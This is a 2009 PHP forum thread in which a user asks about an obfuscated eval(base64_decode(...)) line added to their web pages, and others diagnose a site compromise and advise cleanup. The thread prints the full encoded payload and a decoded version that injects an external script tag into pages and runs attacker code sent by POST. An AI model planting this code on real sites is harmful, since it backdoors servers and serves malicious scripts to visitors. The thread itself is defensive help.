Page 1 of 1

<?php eval(base64_decode('aWYoI....)); ?> Is website hacked?

Posted: Tue Nov 10, 2009 9:51 am
by nehrav
Hi,

I want advice on this from experts.

Some of my web documents are showing

Code: Select all

<?php eval(base64_decode('aWYoIWZ1......a long thread of code.............')); ?>
added automatically :banghead: in the first line of my web pages, on uploading them on server :dubious: ,
whereas I haven't add any code of this sort on my own.

Anybody have the idea, why it's reacting so strange.... :crazy:

Re: <?php eval(base64_decode('aWYoI....)); ?> Is website hacked?

Posted: Tue Nov 10, 2009 10:03 am
by onion2k
That doesn't look good, but what it's actually doing depends on what the code is. Post it in full here (in

Code: Select all

or

Code: Select all

tags) and one of us will tell you exactly what it is.

Re: <?php eval(base64_decode('aWYoI....)); ?> Is website hacked?

Posted: Tue Nov 10, 2009 10:06 am
by nehrav
onion2k wrote:That doesn't look good, but what it's actually doing depends on what the code is. Post it in full here (in

Code: Select all

or

Code: Select all

tags) and one of us will tell you exactly what it is.[/quote]


Thanks for your quick reply onion, but is it safe to post it here..  . Secondly, Is it somewhere related to website hacking??

Re: <?php eval(base64_decode('aWYoI....)); ?> Is website hacked?

Posted: Tue Nov 10, 2009 10:36 am
by Apollo
Yep, your website or server got hacked. Better change your passwords immediately, re-upload your site completely, and inform your hosting provider.

Re: <?php eval(base64_decode('aWYoI....)); ?> Is website hacked?

Posted: Tue Nov 10, 2009 10:58 am
by pickle
Yes it's safe to post. As long as the eval() isn't executed (PHP code that is posted isn't executed), there's no harm. My guess is it's an iframe of some sort.

Re: <?php eval(base64_decode('aWYoI....)); ?> Is website hacked?

Posted: Wed Nov 11, 2009 4:49 am
by nehrav
ok, then code automatically added on my index page is

Code: Select all

<?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygndXEyJykpe2Z1bmN0aW9uIHVxMigkcyl7aWYocHJlZ19tYXRjaF9hbGwoJyM8c2NyaXB0KC4qPyk8L3NjcmlwdD4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihjb3VudChleHBsb2RlKCJcbiIsJHYpKT41KXskZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9IycsJHYpO2lmKChwcmVnX21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9tQ2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwnZG9jdW1lbnQud3JpdGUnKSkpJHM9c3RyX3JlcGxhY2UoJHYsJycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFtePl0qPylzcmM9W1wnIl0/KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1hcyR2KWlmKHByZWdfbWF0Y2goJyNbXC4gXXdpZHRoXHMqPVxzKltcJyJdPzAqWzAtOV1bXCciPiBdfGRpc3BsYXlccyo6XHMqbm9uZSNpJywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9cHJlZ19yZXBsYWNlKCcjJy5wcmVnX3F1b3RlKCR2LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzPXN0cl9yZXBsYWNlKCRhPWJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0RvdkwzWmhjMkZwYTJGeUxtOXlaeTl0WVcxaWIzUnpMM05sWVhKamFDNXdhSEFnUGp3dmMyTnlhWEIwUGc9PScpLCcnLCRzKTtpZihzdHJpc3RyKCRzLCc8Ym9keScpKSRzPXByZWdfcmVwbGFjZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHMsMSk7ZWxzZWlmKHN0cnBvcygkcywnPGEnKSkkcz0kYS4kcztyZXR1cm4kczt9ZnVuY3Rpb24gdXEyMigkYSwkYiwkYywkZCl7Z2xvYmFsJHVxMjE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJHVxMjEpKWNhbGxfdXNlcl9mdW5jKCR1cTIxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpYXMkdilpZigoJGE9JHZbJ25hbWUnXSk9PSd1cTInKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2Ukc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCd1cTInKTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0kdXEybD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcigndXEyMicpKSE9J3VxMjInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==')); ?>
Please, help me as I have no idea of this. I am new to php...

Re: <?php eval(base64_decode('aWYoI....)); ?> Is website hacked?

Posted: Wed Nov 11, 2009 4:50 am
by nehrav
Apollo wrote:Yep, your website or server got hacked. Better change your passwords immediately, re-upload your site completely, and inform your hosting provider.
Which password I need to change, FTP or database or something else???

Re: <?php eval(base64_decode('aWYoI....)); ?> Is website hacked?

Posted: Wed Nov 11, 2009 4:59 am
by Apollo
nehrav wrote:Which password I need to change, FTP or database or something else???
ALL!

Your account has been compromised. So better change any password you have that is related to this account.

Re: <?php eval(base64_decode('aWYoI....)); ?> Is website hacked?

Posted: Wed Nov 11, 2009 5:08 am
by josh

Code: Select all

if(!function_exists('uq2')){function uq2($s){if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0]as$v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))foreach($a[0]as$v)if(preg_match('#[\. ]width\s*=\s*[\'"]?0*[0-9][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);$s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL3Zhc2Fpa2FyLm9yZy9tYW1ib3RzL3NlYXJjaC5waHAgPjwvc2NyaXB0Pg=='),'',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s,1);elseif(strpos($s,'<a'))$s=$a.$s;return$s;}function uq22($a,$b,$c,$d){global$uq21;$s=array();if(function_exists($uq21))call_user_func($uq21,$a,$b,$c,$d);foreach(@ob_get_status(1)as$v)if(($a=$v['name'])=='uq2')return;elseif($a=='ob_gzhandler')break;else$s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('uq2');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}$uq2l=(($a=@set_error_handler('uq22'))!='uq22')?$a:0;eval(base64_decode($_POST['e']));
Which has the result of appending

Code: Select all

script src=http://vasaikar.org/mambots/search.php ></script>
to the end of your body tag. And that url gives me a 404, probably returned the real code. The hacker did it this way so after he took it down there was no trace of what he did.

Re: <?php eval(base64_decode('aWYoI....)); ?> Is website hacked?

Posted: Wed Nov 11, 2009 5:18 am
by nehrav
@Josh, what this code means & what the hacker is trying to do??

Plz suggest me, how I can avoid this :banghead: ??

Re: <?php eval(base64_decode('aWYoI....)); ?> Is website hacked?

Posted: Thu Nov 12, 2009 5:46 am
by kaisellgren
Clean up everything you can find on the server, change all passwords (and possibly usernames too), update all software you have there running and avoid using less popular and unknown scripts/software. If it does not get better, you would be better off asking someone to take care of it for yourself.